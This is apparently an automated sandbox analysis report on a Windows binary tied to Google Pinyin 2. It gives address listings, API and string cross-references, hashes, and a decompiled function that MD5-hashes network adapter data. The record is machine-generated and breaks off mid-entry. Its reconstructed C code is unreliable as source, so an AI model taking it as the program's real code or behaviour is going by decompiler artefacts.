0x004785cf
0x004785d2
0x004785d7
0x004785d9
0x004785da
0x004785df
0x004785df
0x004785e2
0x004785f0
0x004785f6
0x004785fc
0x00000000
0x004785fc
0x0047858b
0x0047858c
0x00478591
0x00478594
0x0047859a
0x00478626
0x0047862a
0x00478632
0x00478636
0x00478641
0x00000000
0x00478641
0x00000000
0x0047859a
0x00478574
0x00478535
0x00478490
0x004784a1
0x004784a3
0x004784a8
0x004784a9
0x00000000
0x00478490
0x00478397
0x00478398
0x0047839d
0x004783a3
0x004783a7
0x004783aa
0x004783ae
0x004783b3
0x00478424
0x00478424
0x00478427
0x00478429
0x0047842b
0x0047842f
0x00478432
0x00478437
0x0047843e
0x0047843e
0x00478445
0x00478446
0x00478449
0x0047844b
0x0047844f
0x00478458
0x0047845a
0x00478460
0x00478460
0x0047845c
0x0047845c
0x0047845c
0x00478462
0x00478464
0x00478466
0x00478466
0x00478469
0x00478469
0x0047844b
0x0047846e
0x00478471
0x00478473
0x00478475
0x00478479
0x00478479
0x0047847b
0x0047847b
0x0047847f
0x00000000
0x0047847f
0x004783b5
0x004783bb
0x00000000
0x00000000
0x004783bd
0x004783c2
0x004783c5
0x004783cb
0x004783cf
0x004783d7
0x004783de
0x004783de
0x004783e5
0x004783e6
0x004783eb
0x004783ef
0x004783fa
0x00478400
0x00478400
0x004783fc
0x004783fc
0x004783fc
0x00478404
0x00478406
0x00478406
0x00478409
0x0047840e
0x0047840e
0x004783eb
0x00478414
0x00478417
0x0047841c
0x00478420
0x00478420
0x00000000
0x0047841c
0x00478345
0x00478350
0x00478361
0x00478363
0x00478364
0x00478365
0x0047836e
0x0047836f
0x00478372
0x00000000
0x00478350
0x0047824f
0x00478250
0x00478255
0x00478255
0x0047825b
0x0047825f
0x00478262
0x00478266
0x0047826b
0x004782dc
0x004782dc
0x004782df
0x004782e1
0x004782e3
0x004782e7
0x004782ea
0x004782ef
0x004782f6
0x004782f6
0x004782fd
0x004782fe
0x00478301
0x00478303
0x00478307
0x00478310
0x00478312
0x00478318
0x00478318
0x00478314
0x00478314
0x00478314
0x0047831a
0x0047831c
0x0047831e
0x0047831e
0x00478321
0x00478321
0x00478303
0x00478326
0x00478329
0x0047832b
0x0047832d
0x00478331
0x00478331
0x00478333
0x00478333
0x00478337
0x00000000
0x00478337
0x0047826d
0x00478273
0x00000000
0x00000000
0x00478275
0x0047827a
0x0047827d
0x00478283
0x00478287
0x0047828f
0x00478296
0x00478296
0x0047829d
0x0047829e
0x004782a3
0x004782a7
0x004782b2
0x004782b8
0x004782b8
0x004782b4
0x004782b4
0x004782b4
0x004782bc
0x004782be
0x004782be
0x004782c1
0x004782c6
0x004782c6
0x004782a3
0x004782cc
0x004782cf
0x004782d4
0x004782d8
0x004782d8
0x00000000
0x00478212
0x00478212
0x00478216
0x0047821d
0x00478226
0x00478228
0x0047822d
0x00478232
0x00478233
0x00000000
0x00478216
0x00478210
0x0047816e
0x0047816f
0x00478174
0x0047817a
0x0047817e
0x00478181
0x00478187
0x004781d5
0x004781d5
0x004781db
0x004781dd
0x004781e2
0x004781e8
0x004781e8
0x004781ed
0x004781f3
0x004781f5
0x004781f7
0x004781fb
0x004781fb
0x004781fd
0x004781fd
0x00478204
0x00000000
0x00478204
0x00478189
0x0047818f
0x00478195
0x00000000
0x00478197
0x00478199
0x0047819c
0x004781a6
0x004781ad
0x004781b3
0x004781b8
0x004781b8
0x004781c2
0x004781c5
0x004781cd
0x004781cf
0x004781d1
0x004781d1
0x00000000
0x004781cd
0x00478130
0x00478130
0x00478134
0x0047813e
0x00478141
0x00478143
0x00478144
0x00478145
0x00478147
0x0047814c
0x00478151
0x00478152
0x00000000
0x00478134

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00478296
std::_Xinvalid_argument.LIBCPMT ref: 004782F6

Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3A3
Part of subcall function 004EE38E: __CxxThrowException@8.LIBCMT ref: 004EE3B8
Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3C9

Strings

@, xrefs: 0047822D
H, xrefs: 004789F8
vector<T> too long, xrefs: 00478291, 004782F1, 004783D9, 00478439, 0047851F, 00478566, 00478666, 004786A3
Extension range $0 to $1 includes field "$2" ($3)., xrefs: 0047895A
Extension range $0 to $1 overlaps with already-defined range $2 to $3., xrefs: 00478B8E

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: @$Extension range $0 to $1 includes field "$2" ($3).$Extension range $0 to $1 overlaps with already-defined range $2 to $3.$H$vector<T> too long
API String ID: 963545896-1266223933
Opcode ID: a11c7c738739f06f88fbbfe05f54e115e84336b055124a7cb9c59db826b3f599
Instruction ID: 10159bc02dd46261efd3cc2d2e84f7bc0b2619bf75e8ab0557d5847efac7003f
Opcode Fuzzy Hash: a11c7c738739f06f88fbbfe05f54e115e84336b055124a7cb9c59db826b3f599
Instruction Fuzzy Hash: 158271716043418FC724DF25C984AABB7E5FF88304F148A2EE89E97351EB34E945CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00463680, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 181
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E00463680(void* __ebp, intOrPtr _a4, char _a8, intOrPtr _a400, char _a10272, char _a10368, char _a10376, char _a10377, char _a10584, char _a10624, char _a10625, char _a10804, char _a10824, char _a10825, signed int _a11136, intOrPtr _a11140, signed int _a11144, void* _a11148, intOrPtr _a11164) {
				char _v0;
				void* _v16;
				long* _v36;
				void* _v40;
				intOrPtr _v60;
				char _v68;
				intOrPtr _v76;
				char _v88;
				intOrPtr _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t49;
				signed int _t51;
				void* _t55;
				void* _t63;
				void* _t67;
				long* _t68;
				char* _t70;
				intOrPtr _t71;
				intOrPtr _t72;
				void* _t79;
				void* _t82;
				signed int _t85;
				void* _t102;
				void* _t103;
				char* _t104;
				char* _t105;
				void* _t106;
				void* _t107;
				void* _t109;
				intOrPtr* _t110;
				void* _t111;
				signed int _t115;
				signed int _t116;

				L00504AA0(0x2b98);
				_t49 =  *0x5596fc; // 0x9d48295
				_a11144 = _t49 ^ _t115;
				_t51 =  *0x5596fc; // 0x9d48295
				 *[fs:0x0] =  &_a11148;
				_t113 = _a11164;
				_v0 = 0;
				_a4 = _a11164;
				_a10376 = 0;
				_t55 = L004F3CE0( &_a10377, 0, 0xff);
				_t116 = _t115 + 0xc;
				_v0 = 0x2880;
				__imp__GetAdaptersInfo( &_a8,  &_v0, _t51 ^ _t115, _t102, _t106, __ebp, _t79,  *[fs:0x0], 0x51658b, 0xffffffff);
				if(_t55 != 0) {
					L15:
					_t97 =  *0x559000; // 0x521840
					_t38 = _t97 + 0xc; // 0x4edeb4
					_v0 =  *((intOrPtr*)( *_t38))() + 0x10;
					_t85 =  &_a10368;
					_a11148 = 0;
					_t129 = _t85 & 0xffff0000;
					if((_t85 & 0xffff0000) != 0) {
						L004C7E30(_t113,  &_a10368);
					} else {
						_t97 = _t85;
						_t108 = _t85 & 0x0000ffff;
						_t63 = L00410DE0(_t129, _t85 & 0x0000ffff);
						_t90 = _t63;
						_t116 = _t116 + 4;
						if(_t63 != 0) {
							L00410F90(_t108, _t90, _t97, _t113);
						}
					}
					 *[fs:0x0] = _a11140;
					_pop(_t103);
					_pop(_t107);
					_pop(_t82);
					return L004EEDC9(_t113, _t82, _a11136 ^ _t116, _t97, _t103, _t107);
				}
				_a10624 = 0;
				_t67 = L004F3CE0( &_a10625, 0, 0xff);
				_t116 = _t116 + 0xc;
				_t109 = 0;
				if(_a400 <= 0) {
					L4:
					_v16 = 0;
					__imp__CryptAcquireContextW( &_v16, 0, L"Microsoft Base Cryptographic Provider v1.0", 1, 0xf0000000);
					if(_t67 == 0) {
						L13:
						_t68 = _v36;
						if(_t68 != 0) {
							CryptReleaseContext(_t68, 0);
						}
						goto L15;
					}
					_t70 =  &_v40;
					_v40 = 0;
					__imp__CryptCreateHash(_v36, 0x8004, 0, 0, _t70);
					if(_t70 == 0) {
						L11:
						_t71 = _v60;
						if(_t71 != 0) {
							__imp__CryptDestroyHash(_t71);
						}
						goto L13;
					}
					_t72 = _v60;
					__imp__CryptHashData(_t72,  &_a10584, 0x100, 0);
					if(_t72 == 0) {
						goto L11;
					}
					_v68 = 0;
					_a10824 = 0;
					L004F3CE0( &_a10825, 0, 0xff);
					_t110 = __imp__CryptGetHashParam;
					_t116 = _t116 + 0xc;
					_push(0);
					_push( &_v68);
					_push(0);
					_push(2);
					_push(_v76);
					if( *_t110() == 0) {
						goto L11;
					}
					_push(0);
					_push( &_v88);
					_push( &_a10804);
					_push(2);
					_push(_v96);
					if( *_t110() != 0) {
						_t111 = 0;
						_t104 =  &_a10272;
						do {
							L004EFD15(_t104, "%02x",  *(_t116 + _t111 + 0x2aa8) & 0x000000ff);
							_t111 = _t111 + 1;
							_t116 = _t116 + 0xc;
							_t104 = _t104 + 2;
						} while (_t111 < 0x10);
					}
					goto L11;
				} else {
					_t105 =  &_a10624;
					do {
						_t67 = L004EFD15(_t105, "%02x",  *(_t116 + _t109 + 0x1bc) & 0x000000ff);
						_t109 = _t109 + 1;
						_t116 = _t116 + 0xc;
						_t105 = _t105 + 2;
					} while (_t109 < _a400);
					goto L4;
				}
			}

0x00463693
0x00463698
0x0046369f
0x004636aa
0x004636b9
0x004636bf
0x004636d5
0x004636da
0x004636de
0x004636e5
0x004636ea
0x004636f7
0x004636ff
0x00463707
0x0046386f
0x0046386f
0x00463875
0x00463882
0x00463885
0x0046388c
0x00463893
0x00463899
0x004638c2
0x0046389b
0x0046389b
0x0046389d
0x004638a1
0x004638a6
0x004638a8
0x004638ad
0x004638b2
0x004638b2
0x004638ad
0x004638d0
0x004638d8
0x004638d9
0x004638db
0x004638f0
0x004638f0
0x0046371b
0x00463722
0x00463727
0x0046372a
0x00463733
0x00463764
0x00463776
0x0046377a
0x00463782
0x0046385f
0x0046385f
0x00463865
0x00463869
0x00463869
0x00000000
0x00463865
0x0046378c
0x00463799
0x0046379d
0x004637a5
0x00463850
0x00463850
0x00463856
0x00463859
0x00463859
0x00000000
0x00463856
0x004637ab
0x004637be
0x004637c6
0x00000000
0x00000000
0x004637da
0x004637de
0x004637e5
0x004637ee
0x004637f4
0x004637f7
0x004637fc
0x004637fd
0x004637fe
0x00463800
0x00463805
0x00000000
0x00000000
0x0046380b
0x00463810
0x00463818
0x00463819
0x0046381b
0x00463820
0x00463822
0x00463824
0x00463830
0x0046383f
0x00463844
0x00463845
0x00463848
0x0046384b
0x00463830
0x00000000
0x00463735
0x00463735
0x00463740
0x0046374f
0x00463754
0x00463755
0x00463758
0x0046375b
0x00000000
0x00463740

APIs

_memset.LIBCMT ref: 004636E5
GetAdaptersInfo.IPHLPAPI ref: 004636FF
_memset.LIBCMT ref: 00463722
_sprintf.LIBCMT ref: 0046374F
CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,?,?,?), ref: 0046377A
CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?,?,?,?), ref: 0046379D
CryptHashData.ADVAPI32(?,?,00000100,00000000,?,?,?), ref: 004637BE
_memset.LIBCMT ref: 004637E5
CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,?,?,?,?), ref: 00463801
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,?,?,?,?,?), ref: 0046381C
_sprintf.LIBCMT ref: 0046383F
CryptDestroyHash.ADVAPI32(?,?,?,?), ref: 00463859
CryptReleaseContext.ADVAPI32(?,00000000,?,?,?), ref: 00463869

Strings

%02x, xrefs: 00463749, 00463839
Microsoft Base Cryptographic Provider v1.0, xrefs: 0046376B

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Crypt$Hash$_memset$ContextParam_sprintf$AcquireAdaptersCreateDataDestroyInfoRelease
String ID: %02x$Microsoft Base Cryptographic Provider v1.0
API String ID: 3915993297-960727614
Opcode ID: 78ca891960ad1be52748c925b1fd2aa40e443ad424413b63f89a31f0fa0f0e14
Instruction ID: 35ad0ab88f2c53b96e51b6da8a951032e0e975f107723094b7a2d27d6199717b
Opcode Fuzzy Hash: 78ca891960ad1be52748c925b1fd2aa40e443ad424413b63f89a31f0fa0f0e14
Instruction Fuzzy Hash: E55106B1608380AFD320DF558C85EABB7E8FF94705F00492EF58993241E7389A48C76B

Uniqueness

Uniqueness Score: -1.00%

Function 00466530, Relevance: 25.4, APIs: 3, Strings: 11, Instructions: 932COMMON

Download Yara Rule

Strings

gfff, xrefs: 00466BA5
gfff, xrefs: 00466ACF
gfff, xrefs: 00466B42
gfff, xrefs: 004665C4
gfff, xrefs: 00466EAE
gfff, xrefs: 00466A23
gfff, xrefs: 00466BCE
vector<T> too long, xrefs: 00466B32
,#S, xrefs: 00467048
gfff, xrefs: 00466C09
(, xrefs: 00466EA7

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: _malloc
String ID: ($,#S$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$vector<T> too long
API String ID: 1579825452-572886045
Opcode ID: 07d8f969e2a38024e499688d6c0d25fbd9c18093cfcbd5f25d975ce98705d55a
Instruction ID: a6593d16d1c99220b1522e2bd9d4e2c8446d86178b8edc2c3394350344342a72
Opcode Fuzzy Hash: 07d8f969e2a38024e499688d6c0d25fbd9c18093cfcbd5f25d975ce98705d55a
Instruction Fuzzy Hash: 1282F9715083818FD734DF29C494BEBB7E5AF85304F144A2EE89A87381EB75A904CB97

Uniqueness

Uniqueness Score: -1.00%

Function 00413360, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 154fileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004133BA
_memset.LIBCMT ref: 004133DA
PathCombineW.SHLWAPI(?,00000000,00530660,?,?,?,00000000), ref: 004133F2
FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00413405
_memset.LIBCMT ref: 00413431
PathCombineW.SHLWAPI(?,00000000,?,?,?,?,?,?,?,00000000), ref: 00413449
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0041351A
FindClose.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00413529
RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00413532
MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,?,?,?,00000000), ref: 00413542

Strings

., xrefs: 0041345E

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind_memset$CombinePath$CloseDirectoryFirstMoveNextRemove
String ID: .
API String ID: 3465664188-248832578
Opcode ID: 7302526a160cd9a945124e8333b5f3fbcfb40a6226d9722e6c633cbbd5f7bb81
Instruction ID: 22da61d63c616557a29c4e42a84aaf27dded663110294c704f54224831357acf
Opcode Fuzzy Hash: 7302526a160cd9a945124e8333b5f3fbcfb40a6226d9722e6c633cbbd5f7bb81
Instruction Fuzzy Hash: 3A5104711087419FD720DF24C849FDBB7E8AFA5714F004A1EF19983290EB399A48CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004166B0, Relevance: 21.8, APIs: 5, Strings: 7, Instructions: 754fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00405450: std::_Xinvalid_argument.LIBCPMT ref: 004054B0
Part of subcall function 00405450: _memmove.LIBCMT ref: 00405506

Part of subcall function 004051E0: _memmove.LIBCMT ref: 00405218

Part of subcall function 00406960: OutputDebugStringA.KERNEL32(?,00000002), ref: 004069EB
Part of subcall function 00406960: InitializeCriticalSection.KERNEL32(0055F654,00000002), ref: 00406A10
Part of subcall function 00406960: EnterCriticalSection.KERNEL32(0055F654,00000002), ref: 00406A21
Part of subcall function 00406960: _fprintf.LIBCMT ref: 00406A56
Part of subcall function 00406960: LeaveCriticalSection.KERNEL32(0055F654,?,?,?,?,00000000,?), ref: 00406A63
Part of subcall function 00406960: IsDebuggerPresent.KERNEL32(?), ref: 00406A81
Part of subcall function 00406960: DebugBreak.KERNEL32(?,?,?,?,?,00000000,?), ref: 00406A8B
Part of subcall function 00406960: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00406B8A

_memset.LIBCMT ref: 00416EF6
CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00416FD3
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,?,00000000), ref: 00416FF6
_memset.LIBCMT ref: 004170AD
_memset.LIBCMT ref: 004170E1

Strings

model, xrefs: 00416BEA
userdict, xrefs: 00416A60
url.index, xrefs: 004170E9
custom_shuangpin_dict, xrefs: 00416709
cache, xrefs: 004168C9
url.data, xrefs: 004170B5
customtoken, xrefs: 00416DB1, 00416DF9, 00416F05

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection_memset$DebugFile_memmove$AttributesBreakCopyDebuggerEnterInitializeIos_base_dtorLeaveOutputPresentStringXinvalid_argument_fprintfstd::_std::ios_base::_
String ID: cache$custom_shuangpin_dict$customtoken$model$url.data$url.index$userdict
API String ID: 2342999473-1663332936
Opcode ID: 6472e58906d9a249097a67f24b660648f76ce65d2249715e7d8eb9cd2bfaf120
Instruction ID: b69ab5f7bbc1dba1c4094ae6297c87e0781fcdeaa2113a71fb652ede70e3bc34
Opcode Fuzzy Hash: 6472e58906d9a249097a67f24b660648f76ce65d2249715e7d8eb9cd2bfaf120
Instruction Fuzzy Hash: 0F72AFB19083818BD730DF65C845BDFB7E4AF95304F01892EE59D47282EB78A588CB97

Uniqueness

Uniqueness Score: -1.00%

Function 004DC4D0, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 207threadprocessCOMMON

Download Yara Rule

APIs

Part of subcall function 004DCD40: OpenMutexW.KERNEL32(00000001,00000000,00000000,?,00000000), ref: 004DCDBA
Part of subcall function 004DCD40: CloseHandle.KERNEL32(00000000), ref: 004DCE1B

Part of subcall function 004DD520: GetCurrentProcess.KERNEL32(000F01FF,?), ref: 004DD5B2
Part of subcall function 004DD520: OpenProcessToken.ADVAPI32(00000000), ref: 004DD5B9
Part of subcall function 004DD520: GetLastError.KERNEL32 ref: 004DD5C3

CloseHandle.KERNEL32(?), ref: 004DC58B
_memset.LIBCMT ref: 004DC669
CreateProcessAsUserW.ADVAPI32(?,?,?,00000000,00000000,00000000,0100040C,00000000,00000000,?,?), ref: 004DC6BD
GetLastError.KERNEL32 ref: 004DC6C7
CloseHandle.KERNEL32(?), ref: 004DC6FF
AssignProcessToJobObject.KERNEL32 ref: 004DC71B
GetLastError.KERNEL32 ref: 004DC725
CloseHandle.KERNEL32(?), ref: 004DC74F
SetThreadToken.ADVAPI32(?,?), ref: 004DC762
ResumeThread.KERNEL32(00000000), ref: 004DC77D
CloseHandle.KERNEL32(?), ref: 004DC79C

Strings

D, xrefs: 004DC675

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$Process$ErrorLast$OpenThreadToken$AssignCreateCurrentMutexObjectResumeUser_memset
String ID: D
API String ID: 989356616-2746444292
Opcode ID: 91691272c3cb846d031bda5c4689aebf72676aefbab257cca9383d32fd630f5b
Instruction ID: a95726b93a05b12c3c271d9a5d1fe934f67b75154c32a7106b59d11628e0756f
Opcode Fuzzy Hash: 91691272c3cb846d031bda5c4689aebf72676aefbab257cca9383d32fd630f5b
Instruction Fuzzy Hash: C3816E756043829BC720DF25D895B9BB7E4BF99304F108D2EE98997341EB38A809CB56

Uniqueness

Uniqueness Score: -1.00%

Function 004C24B0, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000), ref: 004C24F3
CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,09D48295), ref: 004C2514
CryptReleaseContext.ADVAPI32(?,00000000), ref: 004C2524
CryptHashData.ADVAPI32(09D48295,-00000010,-00000020,00000000), ref: 004C2597
CryptDestroyHash.ADVAPI32(09D48295), ref: 004C25BA
CryptReleaseContext.ADVAPI32(?,00000000), ref: 004C25C7
CryptGetHashParam.ADVAPI32(09D48295,00000004,?,?,00000000), ref: 004C2624
CryptGetHashParam.ADVAPI32(09D48295,00000002,00000000,?,00000000), ref: 004C2648
CryptDestroyHash.ADVAPI32(09D48295), ref: 004C2659
CryptReleaseContext.ADVAPI32(?,00000000), ref: 004C2666
CryptDestroyHash.ADVAPI32(09D48295), ref: 004C268E

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 004C24E7

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Crypt$Hash$Context$DestroyRelease$Param$AcquireCreateData
String ID: Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 2102843587-1948191093
Opcode ID: a72decc0f07cfe66725c86da2b0d280a267ad2d3782ad7cf18565250826d54e3
Instruction ID: 55800cfb181adee3e636bc1611f896c058c02d1491e975136ead6b3b2048e459
Opcode Fuzzy Hash: a72decc0f07cfe66725c86da2b0d280a267ad2d3782ad7cf18565250826d54e3
Instruction Fuzzy Hash: 86517A79204301EFD714CF24C995F6BB7E8FB98714F10891EF58597280EBB8E8498B65

Uniqueness

Uniqueness Score: -1.00%

Function 0043D2D0, Relevance: 19.6, APIs: 5, Strings: 6, Instructions: 338stringwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00453D20: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,09D48295), ref: 00453D9B
Part of subcall function 00453D20: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 00453DA6

Part of subcall function 00456D70: RegCreateKeyExW.ADVAPI32 ref: 00456DB9
Part of subcall function 00456D70: lstrlenW.KERNEL32(00000000), ref: 00456DC8
Part of subcall function 00456D70: RegSetValueExW.ADVAPI32(00000000,?,00000000,00000001,00000000,00000000), ref: 00456DE3
Part of subcall function 00456D70: RegCloseKey.ADVAPI32(00000000,?,00000000,00000001,00000000,00000000), ref: 00456DEE

PathFileExistsW.SHLWAPI(?,?), ref: 0043D43B
CreateDirectoryW.KERNEL32(?,00000000), ref: 0043D44B

Part of subcall function 00456D70: RegDeleteValueW.ADVAPI32(00000000,00000000), ref: 00456E04
Part of subcall function 00456D70: RegCloseKey.ADVAPI32(00000000), ref: 00456E0F

lstrlenW.KERNEL32(os=win_x64), ref: 0043D55A
lstrlenW.KERNEL32(os=win_x86), ref: 0043D5AF
Shell_NotifyIconW.SHELL32 ref: 0043D75A

Strings

os=win_x64, xrefs: 0043D54E, 0043D58C
p1S, xrefs: 0043D32D
https://tools.google.com/service/update, xrefs: 0043D34A
Software\Google\Google Pinyin 2\Autoupdate, xrefs: 0043D31A
os=win_x86, xrefs: 0043D5A3, 0043D5E1
pinyin, xrefs: 0043D31F

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Create$lstrlen$CloseEventValue$DeleteDirectoryExistsFileIconNotifyPathShell_
String ID: Software\Google\Google Pinyin 2\Autoupdate$https://tools.google.com/service/update$os=win_x64$os=win_x86$p1S$pinyin
API String ID: 1287719964-983949337
Opcode ID: 926f2bf4434666743253501a919ccf49d049f4acf7a8774bffed00e580ad96e6
Instruction ID: 8b8346eccc9c08b443b90bd1134fa2209dc20015e7054e72aab1e53b9cb8df87
Opcode Fuzzy Hash: 926f2bf4434666743253501a919ccf49d049f4acf7a8774bffed00e580ad96e6
Instruction Fuzzy Hash: C8D1C7B16083808BC730DF29C84175FB7E9FF99318F04492EF65997292D7389909CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00460360, Relevance: 16.2, APIs: 4, Strings: 5, Instructions: 416COMMON

Download Yara Rule

Strings

4TS, xrefs: 00460723
/../, xrefs: 00460598
/..\, xrefs: 004605AF
\../, xrefs: 00460581
\..\, xrefs: 0046056A

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID:
